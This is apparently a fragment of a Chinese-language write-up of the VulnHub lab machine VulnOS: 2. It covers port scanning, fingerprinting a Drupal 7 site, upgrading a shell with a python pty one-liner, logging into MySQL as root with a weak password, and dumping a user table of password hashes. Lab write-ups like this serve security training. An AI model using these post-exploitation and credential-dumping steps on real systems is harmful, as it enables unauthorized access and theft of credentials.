靶机链接:https://www.vulnhub.com/entry/vulnos-2,147/
环境配置
| 名称 | IP |
|---|
| Kali Linux | 10.0.2.46 |
| VULNOS: 2 | 10.0.2.47 |
初步打点
端口扫描
1
2
| $ export rip=10.0.2.47
$ sudo nmap -v -A -p- $rip
|
1
2
| $ whatweb http://10.0.2.47/jabc/
http://10.0.2.47/jabc/ [200 OK] Apache[2.4.7], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[10.0.2.47], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PHP[5.5.9-1ubuntu4.14], Script[text/javascript], Title[JABC | Just Another Bioware Company], UncommonHeaders[x-generator], X-Powered-By[PHP/5.5.9-1ubuntu4.14]
|
1
2
3
4
5
6
7
8
9
10
11
12
13
| $ python -c 'import pty; pty.spawn("/bin/bash")'
$ mysql -uroot -p
mysql -uroot -p
Enter password: toor
mysql> select * from jabcd0cs.odm_user;
select * from jabcd0cs.odm_user;
+----+----------+----------------------------------+------------+-------------+--------------------+-----------+------------+---------------+
| id | username | password | department | phone | Email | last_name | first_name | pw_reset_code |
+----+----------+----------------------------------+------------+-------------+--------------------+-----------+------------+---------------+
| 1 | webmin | b78aae356709f8c31118ea613980954b | 2 | 5555551212 | webmin@example.com | min | web | |
| 2 | guest | 084e0343a0486ff05530df6c705c8bb4 | 2 | 555 5555555 | guest@example.com | guest | guest | NULL |
+----+----------+----------------------------------+------------+-------------+--------------------+-----------+------------+---------------+
|
最后修改于 2016-05-17